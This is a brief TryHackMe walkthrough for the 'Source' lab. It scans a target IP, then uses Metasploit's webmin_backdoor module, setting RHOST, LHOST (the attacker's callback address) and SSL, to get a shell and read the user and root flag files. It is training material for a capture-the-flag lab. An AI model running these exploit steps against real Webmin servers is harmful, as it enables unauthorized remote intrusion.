Source Walkthrough (TryHackMe)
Well It hasn’t given us much except an IP
- Do nmap scan on the target ip:
doesn’t seem helpful much but the service running on port 10000 might give us something.
2. Fire up msfconsole and search for webmin
now the second exploit seems useful.
msf5 > use 2
msf5 exploit(linux/http/webmin_backdoor) > show options
now set RHOST and LHOST
msf5 exploit(linux/http/webmin_backdoor) > set RHOST 10.10.236.242
RHOST => 10.10.236.242
to set LHOST we need our tun0 Ip
msf5 exploit(linux/http/webmin_backdoor) > set LHOST 10.9.159.4
LHOST => 10.9.159.4
msf5 exploit(linux/http/webmin_backdoor) > run
But shows error
So let’s enable the SSL option too
msf5 exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option’s value may require changing RPORT!
SSL => true
3. Now look for the files that has the flag.
find / -type f -name “user.txt”
now if you cat this file you will see the flag.
do the same for another file as well
find / -type f -name “root.txt”
Good Luck!
